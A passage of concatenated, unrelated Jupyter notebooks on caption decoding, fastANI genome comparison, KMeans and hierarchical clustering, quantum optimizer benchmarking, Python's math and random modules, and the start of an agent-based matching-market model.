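The greedy decoding loop in `predict_captions` can be sketched without the trained models. Here `fake_predict` is a stand-in (an assumption for illustration) for `lang_model.predict` that deterministically emits a fixed caption, so only the argmax-until-`<end>` control flow is exercised:

```python
import numpy as np

# Toy vocabulary; index 0 is reserved for padding, as in Keras tokenizers
index2word = {1: '<start>', 2: 'a', 3: 'dog', 4: 'runs', 5: '<end>'}
word2index = {w: i for i, w in index2word.items()}
max_len = 6

def fake_predict(partial_caption):
    """Stub for lang_model.predict: deterministically emit 'a dog runs <end>'."""
    script = [2, 3, 4, 5]
    step = sum(1 for t in partial_caption if t != 0) - 1  # words after <start>
    probs = np.zeros(len(index2word) + 1)
    probs[script[min(step, len(script) - 1)]] = 1.0
    return probs

def greedy_decode():
    words = ['<start>']
    while True:
        seq = [word2index[w] for w in words]
        seq = seq + [0] * (max_len - len(seq))            # post-padding
        next_word = index2word[int(np.argmax(fake_predict(seq)))]
        words.append(next_word)
        if next_word == '<end>' or len(words) > max_len:
            break
    return ' '.join(words[1:-1])

print(greedy_decode())  # a dog runs
```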
| github_jupyter |
# Goal
Question: do the train & test data partitions (genomes) differ in their relatedness distributions?
Why: the metaQUAST misassembly classification distributions differ between train & test
Method: for the train and test data partitions, calculate the pairwise ANI
# Var
```
work_dir = '/ebio/abt3_projects/databases_no-backup/DeepMAsED/GTDB_ref_genomes/fastANI/'
metadata_file = '/ebio/abt3_projects/databases_no-backup/GTDB/release86/metadata_1perGTDBSpec_gte50comp-lt5cont_wPath.tsv'
train_file = file.path(work_dir, '..', 'DeepMAsED_GTDB_genome-refs_train.tsv')
test_file = file.path(work_dir, '..', 'DeepMAsED_GTDB_genome-refs_test.tsv')
threads = 24
conda_env = 'py2_genome'
```
# Init
```
library(dplyr)
library(tidyr)
library(ggplot2)
library(data.table)
library(future)
library(future.batchtools)
library(future.apply)
options(future.wait.interval = 2.0)
set.seed(8364)
#' bash job using conda env
bash_job = function(cmd, conda_env, stdout=TRUE, stderr=FALSE){
# cmd : string; commandline job (eg., 'ls -thlc')
# conda_env : string; conda environment name
cmd = sprintf('. ~/.bashrc; conda activate %s; %s', conda_env, cmd)
cmd = sprintf('-c "%s"', cmd)
system2('bash', cmd, stdout=stdout, stderr=stderr)
}
```
# Load
```
F = file.path(work_dir, 'DeepMAsED_GTDB_genome-refs_train.tsv')
metadata_f_train = read.delim(train_file, sep='\t') %>%
mutate(data_partition = 'Train')
metadata_f_train %>% dim %>% print
metadata_f_train %>% head(n=3)
F = file.path(work_dir, 'DeepMAsED_GTDB_genome-refs_test.tsv')
metadata_f_test = read.delim(test_file, sep='\t') %>%
mutate(data_partition = 'Test')
metadata_f_test %>% dim %>% print
metadata_f_test %>% head(n=3)
```
# fastani
## Train
```
# writing out genome fasta file list
F = file.path(work_dir, 'train_genomes.txt')
metadata_f_train %>%
dplyr::select(Fasta) %>%
write.table(F, sep='\t', quote=FALSE, row.names=FALSE, col.names=FALSE)
cat('File written:', F, '\n')
cmd = 'fastANI {params} --threads {threads} --ql {query_genomes} --rl {ref_genomes} -o {output}'
params = '--fragLen 1000 --minFrag 50 -k 16'
train_outF = file.path(work_dir, 'train_genomes_ANI.tsv')
cmd = glue::glue(cmd, params=params, threads=threads, query_genomes=F, ref_genomes=F, output=train_outF)
cmd
# running job
bash_job(cmd, conda_env)
```
# Test
```
# writing out genome fasta file list
F = file.path(work_dir, 'test_genomes.txt')
metadata_f_test %>%
dplyr::select(Fasta) %>%
write.table(F, sep='\t', quote=FALSE, row.names=FALSE, col.names=FALSE)
cat('File written:', F, '\n')
cmd = 'fastANI {params} --threads {threads} --ql {query_genomes} --rl {ref_genomes} -o {output}'
params = '--fragLen 1000 --minFrag 50 -k 16'
test_outF = file.path(work_dir, 'test_genomes_ANI.tsv')
cmd = glue::glue(cmd, params=params, threads=threads, query_genomes=F, ref_genomes=F, output=test_outF)
cmd
# running job
bash_job(cmd, conda_env)
```
# Loading dist mtx
```
train_dist = fread(train_outF, sep='\t', header=FALSE) %>%
mutate(V1 = basename(V1),
V2 = basename(V2),
data_type = 'Train')
train_dist %>% dim %>% print
train_dist %>% head(n=3)
test_dist = fread(test_outF, sep='\t', header=FALSE) %>%
mutate(V1 = basename(V1),
V2 = basename(V2),
data_type = 'Test')
test_dist %>% dim %>% print
test_dist %>% head(n=3)
```
## Creating plots
```
p = train_dist %>%
rbind(test_dist) %>%
filter(V1 != V2) %>%
mutate(data_type = factor(data_type, levels=c('Train', 'Test'))) %>%
ggplot(aes(V3)) +
geom_histogram(bins=50) +
scale_y_log10() +
labs(x='ANI', y='Count') +
facet_grid(. ~ data_type) +
theme_bw()
options(repr.plot.width=6, repr.plot.height=2.5)
plot(p)
F = file.path(work_dir, 'ANI_histograms.pdf')
ggsave(p, file=F, width=6, height=2.5)
cat('File written:', F, '\n')
```
## Summary of 'close' genomes
### Train
```
df_s = train_dist %>%
filter(V1 != V2) %>%
filter(V3 > 99)
train_close_tax = c(df_s$V1, df_s$V2) %>% unique
train_close_tax %>% print
df_s$V3 %>% summary
metadata_f_train %>%
mutate(Fasta = basename(as.character(Fasta))) %>%
filter(Fasta %in% train_close_tax) %>%
dplyr::select(Taxon, ncbi_taxonomy, gtdb_taxonomy, Fasta, data_partition) %>%
arrange(ncbi_taxonomy)
# Test: summary of "close" genomes
df_s = test_dist %>%
filter(V1 != V2) %>%
filter(V3 > 99)
test_close_tax = c(df_s$V1, df_s$V2) %>% unique
test_close_tax %>% print
df_s$V3 %>% summary
metadata_f_test %>%
mutate(Fasta = basename(as.character(Fasta))) %>%
filter(Fasta %in% test_close_tax) %>%
dplyr::select(Taxon, ncbi_taxonomy, gtdb_taxonomy, Fasta, data_partition) %>%
arrange(ncbi_taxonomy)
```
# fastANI on all genomes
* including train-test ANI
```
# joining
metadata = rbind(metadata_f_train, metadata_f_test)
metadata %>% head(n=3)
# writing out genome fasta file list
F = file.path(work_dir, 'train-test_genomes.txt')
metadata %>%
dplyr::select(Fasta) %>%
write.table(F, sep='\t', quote=FALSE, row.names=FALSE, col.names=FALSE)
cat('File written:', F, '\n')
# creating CMD
cmd = 'fastANI {params} --threads {threads} --ql {query_genomes} --rl {ref_genomes} -o {output}'
params = '--fragLen 1000 --minFrag 50 -k 16'
outF = file.path(work_dir, 'train-test_genomes_ANI.tsv')
cmd = glue::glue(cmd, params=params, threads=threads, query_genomes=F, ref_genomes=F, output=outF)
cmd
# running job
bash_job(cmd, conda_env)
# resources = list(h_rt = '24:00:00',
# h_vmem = '7G',
# threads = '16',
# conda.env = 'py3_physeq') # conda env with batchtools installed
# plan(batchtools_sge, resources=resources, workers=50)
# # apply function (packages set with `future.packages`)
# job_ret = future_lapply(as.list(cmd), FUN = function(x) bash_job(x, conda_env=conda_env))
# job_ret
```
## Summary
```
# loading distance matrix for train dataset
dist = fread(outF, sep='\t', header=FALSE) %>%
mutate(V1 = basename(V1),
V2 = basename(V2))
colnames(dist) = c('Genome.x', 'Genome.y', 'ANI', 'X', 'Y')
dist %>% dim %>% print
dist %>% head(n=3)
```
### Adding partition labels
* which genomes came from which partition?
```
tmp = metadata %>%
distinct(Taxon, accession, Fasta, data_partition) %>%
mutate(Fasta = basename(as.character(Fasta)))
dist = dist %>%
inner_join(tmp, c('Genome.x'='Fasta')) %>%
inner_join(tmp, c('Genome.y'='Fasta'))
dist %>% nrow
dist %>% head
```
### Plotting
```
dist %>%
group_by(data_partition.y, data_partition.x) %>%
summarize(n = n()) %>%
ungroup()
p = dist %>%
filter(Genome.x != Genome.y,
!(data_partition.x == 'Test' &
data_partition.y == 'Train')) %>%
ggplot(aes(ANI)) +
geom_histogram(bins=50) +
scale_y_log10() +
labs(x='ANI', y='Count') +
facet_grid(data_partition.y ~ data_partition.x) +
theme_bw()
options(repr.plot.width=5, repr.plot.height=3)
plot(p)
# writing plot
F = file.path(work_dir, 'ANI_histograms_train-test.pdf')
ggsave(p, file=F, width=5, height=3)
cat('File written:', F, '\n')
# clearing memory
dist = NULL
```
# sessionInfo
```
sessionInfo()
```
| github_jupyter |
```
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns; sns.set()
%matplotlib inline
# Data generating
np.random.seed(37)
X = np.vstack(((np.random.randn(150, 2) + np.array([3, 0])),
(np.random.randn(100, 2) + np.array([-3.5, 0.5])),
(np.random.randn(100, 2) + np.array([-0.5, -2])),
(np.random.randn(150, 2) + np.array([-2, -2.5])),
(np.random.randn(150, 2) + np.array([-5.5, -3]))))
print('First five examples: ', X[:5])
print('X.shape:', X.shape)
plt.scatter(X[:, 0], X[:, 1], s=30)
plt.xlabel('Satisfaction')
plt.ylabel('Loyalty')
ax = plt.gca()
# KMeans
class KMeans_own(object):
"""
Parameters:
-----------
X -- np.array
Matrix of input features
k -- int
Number of clusters
"""
def __init__(self, X, k):
self.X = X
self.k = k
def initialize_centroids(self):
"""
Returns:
Array of shape (k, n_features),
containing k centroids from the initial points
"""
# use shuffle with random state = 100, and pick first k points
np.random.seed(100)
k = self.k
X_for_shuffle = self.X.copy()
np.random.shuffle(X_for_shuffle)
return X_for_shuffle[:k]
def closest_centroid(self, centroids):
"""
Returns:
Array of shape (n_examples, ),
containing index of the nearest centroid for each point
"""
n_examples = self.X.shape[0]
n_features = centroids.shape[1]
k = centroids.shape[0]
closest_centrs = np.full(n_examples, -1)
for i in range(n_examples):
min_distance = np.inf
for j in range(k):
row_norm = np.linalg.norm(self.X[i, :] - centroids[j, :])
current_distance = np.square(row_norm)
if current_distance < min_distance:
min_distance = current_distance
closest_centrs[i] = j
return closest_centrs
def move_centroids(self, centroids):
"""
Returns:
Array of shape (n_clusters, n_features),
containing the new centroids assigned from the points closest to them
"""
n_clusters = centroids.shape[0]
n_features = centroids.shape[1]
closest_centrs = self.closest_centroid(centroids)
new_centers = np.zeros((n_clusters, n_features))
for j in range(n_clusters):
inds = np.where(closest_centrs == j)[0]
X_subset = self.X[inds]
new_centers[j] = np.mean(X_subset, axis=0)
return new_centers
def final_centroids(self):
"""
Returns:
clusters -- list of arrays, containing points of each cluster
centroids -- array of shape (n_clusters, n_features),
containing final centroids
"""
centroids = self.initialize_centroids()
closest_centrs = self.closest_centroid(centroids)
new_centers = self.move_centroids(centroids)
# offset copy so the convergence loop below executes at least once
old_centers = new_centers - 0.5
while not np.array_equal(new_centers, old_centers):
old_centers = new_centers
closest_centrs = self.closest_centroid(new_centers)
new_centers = self.move_centroids(new_centers)
centroids = new_centers
n_clusters = centroids.shape[0]
clusters = []
for j in range(n_clusters):
inds = np.where(closest_centrs == j)[0]
X_subset = self.X[inds]
clusters.append(X_subset)
return clusters, centroids
model = KMeans_own(X, 3)
centroids = model.initialize_centroids()
print('Random centroids:', centroids)
plt.scatter(X[:, 0], X[:, 1], s=30)
plt.scatter(centroids[:,0], centroids[:,1], s=600, marker='*', c='r')
plt.xlabel('Satisfaction')
plt.ylabel('Loyalty')
ax = plt.gca()
closest = model.closest_centroid(centroids)
print('Closest centroids:', closest[:10])
plt.scatter(X[:, 0], X[:, 1], s=30, c=closest, cmap='rainbow')
plt.scatter(centroids[:,0], centroids[:,1], s=600, marker='*', c='b')
plt.xlabel('Satisfaction')
plt.ylabel('Loyalty')
ax = plt.gca()
next_centroids = model.move_centroids(centroids)
print('Next centroids:', next_centroids)
clusters, final_centrs = model.final_centroids()
print('Final centroids:', final_centrs)
print('Clusters points:', clusters[0][0], clusters[1][0], clusters[2][0])
# mean distances
def mean_distances(k, X):
"""
Arguments:
k -- int, number of clusters
X -- np.array, matrix of input features
Returns:
Array of shape (k, ); entry g-1 is the total squared distance from each
point to its assigned centroid, summed over all clusters and divided by g
"""
sum_distances = np.zeros(k)
for g in range(1, k+1):
model = KMeans_own(X, g)
clusters, final_centrs = model.final_centroids()
cluster_distance = np.zeros(g)
for j in range(g):
n_examples = clusters[j].shape[0]
current_distance = np.zeros(n_examples)
for i in range(n_examples):
row_norm = np.linalg.norm(clusters[j][i] - final_centrs[j])
current_distance[i] = np.square(row_norm)
cluster_distance[j] = np.sum(current_distance)
sum_distances[g-1] = np.sum(cluster_distance) / g
return sum_distances
print('Mean distances: ', mean_distances(10, X))
k_clusters = range(1, 11)
distances = mean_distances(10, X)
plt.plot(k_clusters, distances)
plt.xlabel('k')
plt.ylabel('Mean distance')
plt.title('The Elbow Method showing the optimal k')
plt.show()
# Solving the problem using sklearn
from sklearn.cluster import KMeans
from sklearn import preprocessing
data = preprocessing.scale(X)
plt.scatter(data[:, 0], data[:, 1], s=30)
plt.xlabel('Satisfaction')
plt.ylabel('Loyalty')
ax = plt.gca()
kmeans = KMeans(3)
kmeans.fit(data)
plt.scatter(data[:, 0], data[:, 1], c=kmeans.predict(data), cmap='rainbow')
plt.xlabel('Satisfaction')
plt.ylabel('Loyalty')
ax = plt.gca()
kmeans.inertia_
kmeans.cluster_centers_
kmeans = KMeans(4)
kmeans.fit(data)
plt.scatter(data[:, 0], data[:, 1], c=kmeans.predict(data), cmap='rainbow')
plt.xlabel('Satisfaction')
plt.ylabel('Loyalty')
ax = plt.gca()
# Another example
import pandas as pd
dataset = pd.read_csv('Mall_Customers.csv')
dataset.head()
X = dataset.iloc[:, [3, 4]].values
X
wcss = []
for i in range(1, 11):
kmeans = KMeans(n_clusters = i, init = 'k-means++', random_state = 42)
kmeans.fit(X)
wcss.append(kmeans.inertia_)
plt.plot(range(1, 11), wcss)
plt.title('The Elbow Method')
plt.xlabel('Number of clusters')
plt.ylabel('WCSS')
plt.show()
kmeans = KMeans(n_clusters = 5, init = 'k-means++', random_state = 42)
y_kmeans = kmeans.fit_predict(X)
y_kmeans
X[y_kmeans == 0, 0]
X[y_kmeans == 0, 1]
plt.scatter(X[y_kmeans == 0, 0], X[y_kmeans == 0, 1], s = 100, c = 'red', label = 'Cluster 1')
plt.scatter(X[y_kmeans == 1, 0], X[y_kmeans == 1, 1], s = 100, c = 'blue', label = 'Cluster 2')
plt.scatter(X[y_kmeans == 2, 0], X[y_kmeans == 2, 1], s = 100, c = 'green', label = 'Cluster 3')
plt.scatter(X[y_kmeans == 3, 0], X[y_kmeans == 3, 1], s = 100, c = 'cyan', label = 'Cluster 4')
plt.scatter(X[y_kmeans == 4, 0], X[y_kmeans == 4, 1], s = 100, c = 'magenta', label = 'Cluster 5')
plt.scatter(kmeans.cluster_centers_[:, 0], kmeans.cluster_centers_[:, 1], s = 300, c = 'yellow', label = 'Centroids')
plt.title('Clusters of customers')
plt.xlabel('Annual Income (k$)')
plt.ylabel('Spending Score (1-100)')
plt.legend()
plt.show()
cluster1 = np.array([X[y_kmeans == 0, 0], X[y_kmeans == 0, 1]]).T
cluster2 = np.array([X[y_kmeans == 1, 0], X[y_kmeans == 1, 1]]).T
cluster3 = np.array([X[y_kmeans == 2, 0], X[y_kmeans == 2, 1]]).T
cluster4 = np.array([X[y_kmeans == 3, 0], X[y_kmeans == 3, 1]]).T
cluster5 = np.array([X[y_kmeans == 4, 0], X[y_kmeans == 4, 1]]).T
plt.scatter(cluster1[:,0], cluster1[:,1], s = 100, c = 'red', label = 'Cluster 1')
plt.scatter(cluster2[:,0], cluster2[:,1], s = 100, c = 'blue', label = 'Cluster 2')
plt.scatter(cluster3[:,0], cluster3[:,1], s = 100, c = 'green', label = 'Cluster 3')
plt.scatter(cluster4[:,0], cluster4[:,1], s = 100, c = 'cyan', label = 'Cluster 4')
plt.scatter(cluster5[:,0], cluster5[:,1], s = 100, c = 'magenta', label = 'Cluster 5')
plt.scatter(kmeans.cluster_centers_[:, 0], kmeans.cluster_centers_[:, 1], s = 300, c = 'yellow', label = 'Centroids')
plt.title('Clusters of customers')
plt.xlabel('Annual Income (k$)')
plt.ylabel('Spending Score (1-100)')
plt.legend()
plt.show()
# Hierarchical clustering
import scipy.cluster.hierarchy as sch
dendrogram = sch.dendrogram(sch.linkage(X, method = 'ward'))
plt.title('Dendrogram')
plt.xlabel('Customers')
plt.ylabel('Euclidean distances')
plt.show()
from sklearn.cluster import AgglomerativeClustering
hc = AgglomerativeClustering(n_clusters = 5, affinity = 'euclidean', linkage = 'ward')
y_hc = hc.fit_predict(X)
y_hc
plt.scatter(X[y_hc == 0, 0], X[y_hc == 0, 1], s = 100, c = 'red', label = 'Cluster 1')
plt.scatter(X[y_hc == 1, 0], X[y_hc == 1, 1], s = 100, c = 'blue', label = 'Cluster 2')
plt.scatter(X[y_hc == 2, 0], X[y_hc == 2, 1], s = 100, c = 'green', label = 'Cluster 3')
plt.scatter(X[y_hc == 3, 0], X[y_hc == 3, 1], s = 100, c = 'cyan', label = 'Cluster 4')
plt.scatter(X[y_hc == 4, 0], X[y_hc == 4, 1], s = 100, c = 'magenta', label = 'Cluster 5')
plt.title('Clusters of customers')
plt.xlabel('Annual Income (k$)')
plt.ylabel('Spending Score (1-100)')
plt.legend()
plt.show()
# Different algorithms and metrics analysis for MNIST dataset
from sklearn import metrics
from sklearn import datasets
from sklearn.cluster import KMeans, AgglomerativeClustering, AffinityPropagation, SpectralClustering
data = datasets.load_digits()
X, y = data.data, data.target
algorithms = []
algorithms.append(KMeans(n_clusters=10, random_state=1))
algorithms.append(AffinityPropagation())
algorithms.append(SpectralClustering(n_clusters=10, random_state=1,
affinity='nearest_neighbors'))
algorithms.append(AgglomerativeClustering(n_clusters=10))
data = []
for algo in algorithms:
algo.fit(X)
data.append(({
'ARI': metrics.adjusted_rand_score(y, algo.labels_),
'AMI': metrics.adjusted_mutual_info_score(y, algo.labels_),
'Homogeneity': metrics.homogeneity_score(y, algo.labels_),
'Completeness': metrics.completeness_score(y, algo.labels_),
'V-measure': metrics.v_measure_score(y, algo.labels_),
'Silhouette': metrics.silhouette_score(X, algo.labels_)}))
results = pd.DataFrame(data=data, columns=['ARI', 'AMI', 'Homogeneity',
'Completeness', 'V-measure',
'Silhouette'],
index=['K-means', 'Affinity',
'Spectral', 'Agglomerative'])
results
algo = AgglomerativeClustering(n_clusters=10)
algo.fit(X)
algo.labels_
metrics.adjusted_rand_score(y, algo.labels_)
```
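As an aside, the Python-level double loop in `closest_centroid` above can be replaced by a single broadcasted NumPy computation. A standalone sketch (not wired into the class; the `closest_centroid_vectorized` name is ours):

```python
import numpy as np

def closest_centroid_vectorized(X, centroids):
    # squared Euclidean distance between every point and every centroid:
    # broadcasting gives an array of shape (n_examples, k)
    diffs = X[:, np.newaxis, :] - centroids[np.newaxis, :, :]
    sq_dists = np.sum(diffs ** 2, axis=2)
    # index of the nearest centroid for each point; argmin breaks ties
    # toward the lower index, matching the strict '<' in the loop version
    return np.argmin(sq_dists, axis=1)

# tiny sanity check on an obvious configuration
X = np.array([[0.0, 0.0], [10.0, 10.0], [0.2, -0.1]])
centroids = np.array([[0.0, 0.0], [10.0, 10.0]])
labels = closest_centroid_vectorized(X, centroids)  # → [0, 1, 0]
```

On a few hundred points this cuts the assignment step from thousands of interpreted iterations to three array operations.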
# Test: Optimizers performance
In this notebook we are testing how different optimizers such as SPSA, ADAM or COBYLA behave when doing state discrimination.
```
import sys
sys.path.append('../../')
import itertools
import numpy as np
import matplotlib.pyplot as plt
from numpy import pi
from qiskit.algorithms.optimizers import SPSA, COBYLA, ADAM
from qnn.quantum_neural_networks import StateDiscriminativeQuantumNeuralNetworks as nnd
from qnn.quantum_state import QuantumState
plt.style.use('ggplot')
#Number of random states tested
N = 10
# Create random states
random_states = []
for i in range(N):
ψ = QuantumState.random(1)
ϕ = QuantumState.random(1)
random_states.append([ψ, ϕ])
# Parameters
th_u, fi_u, lam_u = [0], [0], [0]
th1, th2 = [0], [pi]
th_v1, th_v2 = [0], [0]
fi_v1, fi_v2 = [0], [0]
lam_v1, lam_v2 = [0], [0]
params = list(itertools.chain(th_u, fi_u, lam_u, th1, th2, th_v1, th_v2, fi_v1, fi_v2, lam_v1, lam_v2))
# Initialize Discriminator
discriminator_list = []
for i in range(N):
discriminator = nnd(random_states[i])
discriminator_list.append(discriminator)
# Optimal solution
optimal_list = []
for i in range(N):
optimal_list.append(nnd.helstrom_bound(random_states[i][0], random_states[i][1]))
# Calculate cost function using SPSA
# We use 75 iterations for SPSA, so it performs 201 function evaluations:
# 50 for calibration, 2 per iteration, and 1 final (50 + 2*75 + 1 = 201).
spsa_results = []
for i in range(N):
results = discriminator_list[i].discriminate(SPSA(75), params)
spsa_results.append(results[1])
# Calculate cost function using ADAM
# ADAM evaluates 12 times per iteration plus one final evaluation, so we use
# 17 iterations to get a total of 12*17 + 1 = 205 evaluations.
adam_results = []
for i in range(N):
results = discriminator_list[i].discriminate(ADAM(17), params)
adam_results.append(results[1])
# Calculate cost function using COBYLA
# COBYLA performs one function evaluation per iteration
cobyla_results = []
for i in range(N):
results = discriminator_list[i].discriminate(COBYLA(200), params)
cobyla_results.append(results[1])
# Let's calculate the mean squared error of the results
def mean_squared_error(results, optimal_list, n):
sol = 0
for i in range(n):
sol += (1 / n) * (results[i] - optimal_list[i]) ** 2
return sol
# SPSA mean_squared_error
spsa_error = mean_squared_error(spsa_results, optimal_list, N)
# ADAM mean_squared_error
adam_error = mean_squared_error(adam_results, optimal_list, N)
# COBYLA mean_squared_error
cobyla_error = mean_squared_error(cobyla_results, optimal_list, N)
x = ["SPSA", "ADAM", "COBYLA"]
y = [spsa_error, adam_error, cobyla_error]
fig = plt.bar(x, y, log=True, color="red")
plt.xlabel("Optimizers")
plt.ylabel("Mean Squared Error")
plt.title("Comparison of different optimizers performance")
plt.savefig('optimizers_performance.png', dpi=400)
plt.show()
```
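The `mean_squared_error` helper above can also be written as a single NumPy expression. A standalone sketch (the `mean_squared_error_np` name and argument order are ours):

```python
import numpy as np

def mean_squared_error_np(results, optimal):
    # same quantity as the loop version: mean of squared deviations
    results = np.asarray(results, dtype=float)
    optimal = np.asarray(optimal, dtype=float)
    return np.mean((results - optimal) ** 2)

err = mean_squared_error_np([0.2, 0.4], [0.1, 0.5])  # → 0.01
```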
# Math and Random Modules
Python comes with a built-in math module and random module. In this lecture we will give a brief tour of their capabilities. Usually you can simply look up the function call you are looking for in the online documentation.
* [Math Module](https://docs.python.org/3/library/math.html)
* [Random Module](https://docs.python.org/3/library/random.html)
We won't go through every function available in these modules since there are so many, but we will show some useful ones.
## Useful Math Functions
```
import math
help(math)
```
### Rounding Numbers
```
value = 4.35
math.floor(value)
math.ceil(value)
round(value)
```
### Mathematical Constants
```
math.pi
from math import pi
pi
math.e
math.tau
math.inf
math.nan
```
### Logarithmic Values
```
math.e
# Log Base e
math.log(math.e)
# Will produce an error if the value does not exist mathematically
math.log(0)
math.log(10)
math.e ** 2.302585092994046
```
### Custom Base
```
# math.log(x,base)
math.log(100,10)
10**2
```
### Trigonometric Functions
```
# Radians
math.sin(10)
math.degrees(pi/2)
math.radians(180)
```
# Random Module
The random module allows us to create random numbers. We can even set a seed to produce the same random set every time.
The explanation of how a computer attempts to generate random numbers is beyond the scope of this course since it involves higher-level mathematics. But if you are interested in this topic check out:
* https://en.wikipedia.org/wiki/Pseudorandom_number_generator
* https://en.wikipedia.org/wiki/Random_seed
## Understanding a seed
Setting a seed allows us to start from a seeded pseudorandom number generator, which means the same random numbers will show up in a series. Note, you need the seed to be in the same cell if you're using Jupyter to guarantee the same results each time. Getting the same set of random numbers can be important in situations where you will be trying different variations of functions and want to compare their performance on random values, but want to do it fairly (so you need the same set of random numbers each time).
```
import random
random.randint(0,100)
random.randint(0,100)
# The value 101 is completely arbitrary, you can pass in any number you want
random.seed(101)
# You can run this cell as many times as you want, it will always return the same number
random.randint(0,100)
random.randint(0,100)
# The value 101 is completely arbitrary, you can pass in any number you want
random.seed(101)
print(random.randint(0,100))
print(random.randint(0,100))
print(random.randint(0,100))
print(random.randint(0,100))
print(random.randint(0,100))
```
### Random Integers
```
random.randint(0,100)
```
### Random with Sequences
#### Grab a random item from a list
```
mylist = list(range(0,20))
mylist
random.choice(mylist)
mylist
```
### Sample with Replacement
Take a sample size, allowing picking elements more than once. Imagine a bag of numbered lottery balls, you reach in to grab a random lotto ball, then after marking down the number, **you place it back in the bag**, then continue picking another one.
```
random.choices(population=mylist,k=10)
```
### Sample without Replacement
Once an item has been randomly picked, it can't be picked again. Imagine a bag of numbered lottery balls, you reach in to grab a random lotto ball, then after marking down the number, you **leave it out of the bag**, then continue picking another one.
```
random.sample(population=mylist,k=10)
```
### Shuffle a list
**Note: This affects the object in place!**
```
# Don't assign this to anything!
random.shuffle(mylist)
mylist
```
### Random Distributions
#### [Uniform Distribution](https://en.wikipedia.org/wiki/Uniform_distribution)
```
# Continuous: picks a random value between a and b; each value has an equal chance of being picked.
random.uniform(a=0,b=100)
```
#### [Normal/Gaussian Distribution](https://en.wikipedia.org/wiki/Normal_distribution)
```
random.gauss(mu=0,sigma=1)
```
Final Note: If you find yourself using these libraries a lot, take a look at the NumPy library for Python, which covers all these capabilities with extreme efficiency. We cover this library and a lot more in our data science and machine learning courses.
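Following up on that final note, here is a rough NumPy counterpart of the calls shown in this lecture, using NumPy's `default_rng` generator API (the mapping to the random-module calls is noted in the comments):

```python
import numpy as np

rng = np.random.default_rng(seed=101)       # seeded generator, like random.seed(101)

ints = rng.integers(0, 101, size=5)         # like random.randint(0, 100), vectorized
draw = rng.uniform(0, 100)                  # like random.uniform(a=0, b=100)
gauss = rng.normal(loc=0, scale=1, size=3)  # like random.gauss(mu=0, sigma=1)

arr = np.arange(20)
rng.shuffle(arr)                            # in-place shuffle, like random.shuffle
sample = rng.choice(arr, size=10, replace=False)  # like random.sample (no replacement)
```

Because the whole sample is drawn in one vectorized call, this scales to millions of draws where the random-module loop would crawl.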
# Matching Market
This simple model consists of a buyer, a supplier, and a market.
The buyer represents a group of customers whose willingness to pay for a single unit of the good is captured by a vector of prices _wtp_. You can initialize the buyer with a set_quantity function, which randomly assigns the willingness to pay according to your specifications. You may ask for these willingness-to-pay quantities with the _get_bids_ function.
The supplier is similar, but instead the supplier is willing to be paid to sell a unit of technology. The supplier may, for instance, have non-zero variable costs that make them unwilling to produce the good unless they receive a specified price. Similarly, the supplier has a _get_asks_ function which returns a list of desired prices.
The willingness to pay or sell is set randomly using uniform distributions. The resulting list of bids is effectively a demand curve; likewise, the list of asks is effectively a supply curve. A more complex determination of bids and asks is possible, for instance using the time of year to vary the quantities being demanded.
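The bid/ask generation described here can be sketched directly (a minimal illustration; the 10–20 price band and n = 5 are arbitrary choices for the example, not values from the model):

```python
import random as rnd

rnd.seed(0)  # fixed seed so the sketch is reproducible
n = 5

# demand curve: willingness-to-pay values, sorted from most to least eager
bids = sorted((rnd.uniform(10, 20) for _ in range(n)), reverse=True)

# supply curve: willingness-to-accept values, sorted from cheapest to dearest
asks = sorted(rnd.uniform(10, 20) for _ in range(n))
```

Plotted against quantity, `bids` steps downward and `asks` steps upward; where they cross is where trade is possible.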
## New in version 20
- fixed bug in clearing mechanism, included a logic check to avoid weird behavior around zero
## Microeconomic Foundations
The market assumes the presence of an auctioneer which creates a _book_ that seeks to match the bids and the asks as much as possible. If the auctioneer is neutral, then it is incentive-compatible for the buyer and the supplier to truthfully announce their bids and asks. The auctioneer finds a single price which clears as much of the market as possible; clearing the market means that as many willing swaps happen as possible. You may ask the market object at what price the market clears with the get_clearing_price function. You may also ask the market how many units were exchanged with the get_units_cleared function.
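The matching the auctioneer performs can be sketched in isolation. This is a simplified stand-in for the clearing logic implemented in the Market class below: walk sorted bids (descending) and asks (ascending) together, count pairs while the bid still exceeds the ask, and take the last crossing bid as the clearing price.

```python
def clearing_sketch(bids, asks):
    """Return (clearing_price, units_cleared) for one double-auction round."""
    b = sorted(bids, reverse=True)  # most eager buyers first
    s = sorted(asks)                # cheapest sellers first
    price, count = None, 0
    for bid, ask in zip(b, s):      # zip drops the excess side automatically
        if bid > ask:
            count += 1
            price = bid
        else:
            break                   # once the curves cross, no more trades clear
    return price, count

price, units = clearing_sketch([18, 15, 12, 11], [10, 13, 14, 19])  # → (15, 2)
```

Here the third pair (bid 12 vs ask 14) fails to cross, so only two units trade, at the marginal bid of 15.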
## Agent-Based Objects
The following section presents three objects which can be used to make an agent-based model of an efficient, two-sided market.
```
%matplotlib inline
import matplotlib.pyplot as plt
import random as rnd
import pandas as pd
import numpy as np
import time
import datetime
import calendar
import json
import statistics
# fix what is missing with the datetime/time/calendar package
def add_months(sourcedate,months):
month = sourcedate.month - 1 + months
year = int(sourcedate.year + month / 12 )
month = month % 12 + 1
day = min(sourcedate.day,calendar.monthrange(year, month)[1])
return datetime.date(year,month,day)
# measure how long it takes to run the script
startit = time.time()
dtstartit = datetime.datetime.now()
```
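As a quick check of the `add_months` helper, here is a self-contained copy with two example calls (the function body is repeated so the snippet runs on its own):

```python
import calendar
import datetime

def add_months(sourcedate, months):
    # same logic as the notebook helper: roll year/month, clamp the day
    month = sourcedate.month - 1 + months
    year = int(sourcedate.year + month / 12)
    month = month % 12 + 1
    day = min(sourcedate.day, calendar.monthrange(year, month)[1])
    return datetime.date(year, month, day)

d1 = add_months(datetime.date(2013, 1, 31), 1)   # day clamped → 2013-02-28
d2 = add_months(datetime.date(2013, 12, 15), 1)  # year rollover → 2014-01-15
```

The clamp via `calendar.monthrange` is what keeps "Jan 31 plus one month" from producing an invalid date.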
## classes buyers and sellers
Below we are constructing the buyers and sellers in classes.
```
class Seller():
def __init__(self, name):
self.name = name
self.wta = []
self.step = 0
self.prod = 2000
self.lb_price = 10
self.lb_multiplier = 0
self.ub_price = 20
self.ub_multiplier = 0
self.init_reserve = 500000
self.reserve = 500000
self.init_unproven_reserve = 0
self.unproven_reserve = 0
#multiple market idea, also 'go away from market'
self.subscr_market = {}
self.last_price = 15
self.state_hist = {}
self.cur_scenario = ''
self.count = 0
self.storage = 0
self.q_to_market = 0
self.ratio_sold = 0
self.ratio_sold_hist = []
# the supplier has n quantities that they can sell
# they may be willing to sell this quantity anywhere from a lower price of l
# to a higher price of u
